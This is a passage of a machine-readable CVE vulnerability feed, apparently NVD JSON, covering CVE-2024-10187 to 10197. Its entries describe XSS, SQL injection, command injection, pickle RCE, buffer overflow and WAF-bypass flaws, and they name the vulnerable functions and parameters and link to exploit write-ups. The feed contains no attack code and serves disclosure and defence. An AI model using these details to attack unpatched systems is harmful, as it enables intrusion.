"LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-06T13:15Z", "lastModifiedDate" : "2024-11-08T19:21Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10187", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/23a081d4-443d-4b3b-8c89-9eb0e23c961e?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/23a081d4-443d-4b3b-8c89-9eb0e23c961e?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/mycred/#developers", "name" : "https://wordpress.org/plugins/mycred/#developers", "refsource" : "", "tags" : [ "Product", "Release Notes" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3183178/", "name" : "https://plugins.trac.wordpress.org/changeset/3183178/", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The myCred – Loyalty Points and Rewards plugin for WordPress and WooCommerce – Give Points, Ranks, Badges, Cashback, WooCommerce rewards, and WooCommerce credits for Gamification plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mycred_link shortcode in all versions up to, and including, 2.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mycred:mycred:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.7.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-08T10:15Z", "lastModifiedDate" : "2024-11-13T20:31Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10188", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-400" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/berriai/litellm/commit/21156ff5d0d84a7dd93f951ca033275c77e4f73c", "name" : "https://github.com/berriai/litellm/commit/21156ff5d0d84a7dd93f951ca033275c77e4f73c", "refsource" : "", "tags" : [ ] }, { "url" : "https://huntr.com/bounties/96a32812-213c-4819-ba4e-36143d35e95b", "name" : "https://huntr.com/bounties/96a32812-213c-4819-ba4e-36143d35e95b", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability in BerriAI/litellm, as of commit 26c03c9, allows unauthenticated users to cause a Denial of Service (DoS) by exploiting the use of ast.literal_eval to parse user input. This function is not safe and is prone to DoS attacks, which can crash the litellm Python server." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-03-20T10:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10189", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8c8e37f8-708e-41d5-a6b8-3ba587437532?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8c8e37f8-708e-41d5-a6b8-3ba587437532?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/anchor-episodes-index/#developers", "name" : "https://wordpress.org/plugins/anchor-episodes-index/#developers", "refsource" : "", "tags" : [ "Product", "Release Notes" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3171752/", "name" : "https://plugins.trac.wordpress.org/changeset/3171752/", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Anchor Episodes Index (Spotify for Podcasters) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's anchor_episodes shortcode in all versions up to, and including, 2.1.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:jesweb:anchor_episodes_index:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.1.11", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-22T10:15Z", "lastModifiedDate" : "2024-10-29T15:27Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1019", "ASSIGNER" : "vulnerability@ncsc.ch" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/34KDQNZE2RS3CWFG5654LNHKXXDPIW5I/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/34KDQNZE2RS3CWFG5654LNHKXXDPIW5I/", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/34KDQNZE2RS3CWFG5654LNHKXXDPIW5I/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/34KDQNZE2RS3CWFG5654LNHKXXDPIW5I/", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K6ZGABPJK2JPVH2JDFHZ5LQLWGONUH7V/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K6ZGABPJK2JPVH2JDFHZ5LQLWGONUH7V/", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K6ZGABPJK2JPVH2JDFHZ5LQLWGONUH7V/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K6ZGABPJK2JPVH2JDFHZ5LQLWGONUH7V/", "refsource" : "", "tags" : [ ] }, { "url" : "https://owasp.org/www-project-modsecurity/tab_cves#cve-2024-1019-2024-01-30", "name" : "https://owasp.org/www-project-modsecurity/tab_cves#cve-2024-1019-2024-01-30", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://owasp.org/www-project-modsecurity/tab_cves#cve-2024-1019-2024-01-30", "name" : "https://owasp.org/www-project-modsecurity/tab_cves#cve-2024-1019-2024-01-30", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "ModSecurity / libModSecurity 3.0.0 to 3.0.11 is affected by a WAF bypass for path-based payloads submitted via specially crafted request URLs. ModSecurity v3 decodes percent-encoded characters present in request URLs before it separates the URL path component from the optional query string component. This results in an impedance mismatch versus RFC compliant back-end applications. The vulnerability hides an attack payload in the path component of the URL from WAF rules inspecting it. A back-end may be vulnerable if it uses the path component of request URLs to construct queries. Integrators and users are advised to upgrade to 3.0.12. The ModSecurity v2 release line is not affected by this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:owasp:modsecurity:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.0.0", "versionEndExcluding" : "3.0.12", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 8.6, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 4.0 } }, "publishedDate" : "2024-01-30T16:15Z", "lastModifiedDate" : "2025-07-03T20:59Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10190", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-77" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://huntr.com/bounties/3e398d1f-70c2-4e05-ae22-f5d66b19a754", "name" : "https://huntr.com/bounties/3e398d1f-70c2-4e05-ae22-f5d66b19a754", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Horovod versions up to and including v0.28.1 are vulnerable to unauthenticated remote code execution. The vulnerability is due to improper handling of base64-encoded data in the `ElasticRendezvousHandler`, a subclass of `KVStoreHandler`. Specifically, the `_put_value` method in `ElasticRendezvousHandler` calls `codec.loads_base64(value)`, which eventually invokes `cloudpickle.loads(decoded)`. This allows an attacker to send a malicious pickle object via a PUT request, leading to arbitrary code execution on the server." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-03-20T10:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10191", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.280965", "name" : "VDB-280965 | PHPGurukul Boat Booking System Booking Details Page book-details.php cross site scripting", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280965", "name" : "VDB-280965 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?submit.426734", "name" : "Submit #426734 | PHPGurukul Boat Booking System 1.0 Cross Site Scripting", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_booking_details_xss.md", "name" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_booking_details_xss.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, was found in PHPGurukul Boat Booking System 1.0. This affects an unknown part of the file /admin/book-details.php of the component Booking Details Page. The manipulation of the argument Official Remark leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:boat_booking_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-20T06:15Z", "lastModifiedDate" : "2024-10-22T14:33Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10192", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.280966", "name" : "VDB-280966 | PHPGurukul IFSC Code Finder Project search.php cross site scripting", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280966", "name" : "VDB-280966 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?submit.426759", "name" : "Submit #426759 | PHPGurukul IFSC Code Finder 1.0 Cross Site Scripting", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_ifsc_code_finder_search_xss.md", "name" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_ifsc_code_finder_search_xss.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in PHPGurukul IFSC Code Finder Project 1.0 and classified as problematic. This vulnerability affects unknown code of the file search.php. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:ifsc_code_finder:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-20T07:15Z", "lastModifiedDate" : "2024-10-22T15:09Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10193", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-77" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://docs.google.com/document/d/13XWnFITW31u5J8HeQj8Zm-7oLt-M1DtQ/", "name" : "https://docs.google.com/document/d/13XWnFITW31u5J8HeQj8Zm-7oLt-M1DtQ/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280967", "name" : "VDB-280967 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280967", "name" : "VDB-280967 | WAVLINK WN530H4/WN530HG4/WN572HG3 internet.cgi ping_ddns command injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.422811", "name" : "Submit #422811 | wavlink WN530H4,WN530HG4,WN572HG3 WN530H4-WAVLINK_20220721,WN530HG4-WAVLINK_20220809,WN572HG3-WAVLINK_WO_20221028 Command Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in WAVLINK WN530H4, WN530HG4 and WN572HG3 up to 20221028 and classified as critical. This issue affects the function ping_ddns of the file internet.cgi. The manipulation of the argument DDNS leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:wavlink:wn530h4_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "20221028", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:wavlink:wn530h4:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:wavlink:wn530hg4_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "20221028", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:wavlink:wn530hg4:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:wavlink:wn572hg3_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "20221028", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:wavlink:wn572hg3:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-20T08:15Z", "lastModifiedDate" : "2024-10-23T16:16Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10194", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://docs.google.com/document/d/1PodIMRe1f0Ql83jUXV5VIoc-Xsf9VC1K", "name" : "https://docs.google.com/document/d/1PodIMRe1f0Ql83jUXV5VIoc-Xsf9VC1K", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280968", "name" : "VDB-280968 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280968", "name" : "VDB-280968 | WAVLINK WN530H4/WN530HG4/WN572HG3 Front-End Authentication Page login.cgi Goto_chidx stack-based overflow", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?submit.422834", "name" : "Submit #422834 | wavlink WN530H4,WN530HG4,WN572HG3 WN530H4-WAVLINK_20220721,WN530HG4-WAVLINK_20220809,WN572HG3-WAVLINK_WO_20221028 Buffer Overflow", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in WAVLINK WN530H4, WN530HG4 and WN572HG3 up to 20221028. It has been classified as critical. Affected is the function Goto_chidx of the file login.cgi of the component Front-End Authentication Page. The manipulation of the argument wlanUrl leads to stack-based buffer overflow. The attack can only be initiated within the local network. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:wavlink:wn530h4_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "20221028", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:wavlink:wn530h4:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:wavlink:wn530hg4_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "20221028", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:wavlink:wn530hg4:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:wavlink:wn572hg3_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "20221028", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:wavlink:wn572hg3:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "ADJACENT_NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-20T08:15Z", "lastModifiedDate" : "2024-10-23T16:16Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10195", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.280969", "name" : "VDB-280969 | Tecno 4G Portable WiFi TR118 SMS Check goform_get_cmd_process sql injection", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.280969", "name" : "VDB-280969 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?submit.422994", "name" : "Submit #422994 | Tecno 4G Portable WiFi TR118 firmware version(TR118-M30E-RR-D- EnFrArSwHaPo-OP-V008-20220830) SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://asciinema.org/a/2mwkmDqRZfeAYTu5hHre1r4QB", "name" : "https://asciinema.org/a/2mwkmDqRZfeAYTu5hHre1r4QB", "refsource" : "", "tags" : [ "Broken Link" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tecno 4G Portable WiFi TR118 V008-20220830. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /goform/goform_get_cmd_process of the component SMS Check. The manipulation of the argument order_by leads to sql injection. The attack can be launched remotely. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tecno-mobile:4g_portable_wifi_tr118_firmware:v008-20220830:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tecno-mobile:4g_portable_wifi_tr118:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-20T09:15Z", "lastModifiedDate" : "2024-10-24T14:28Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10196", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.281021", "name" : "VDB-281021 | code-projects Pharmacy Management System add_new_invoice.php sql injection", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.281021", "name" : "VDB-281021 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.426862", "name" : "Submit #426862 | code-projects Pharmacy Management System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://gist.github.com/higordiego/be616d2853a9f1820d8558fc00e97e24", "name" : "https://gist.github.com/higordiego/be616d2853a9f1820d8558fc00e97e24", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Pharmacy Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /add_new_invoice.php. The manipulation of the argument text leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:pharmacy_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-21T01:15Z", "lastModifiedDate" : "2024-10-23T14:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10197", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://gist.github.com/higordiego/bc051be4a8c6b6641578cad533742aab", "name" : "https://gist.github.com/higordiego/bc051be4a8c6b6641578cad533742aab", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.281022", "name" : "VDB-281022 | CTI Indicators (IOB, IOC, TTP, 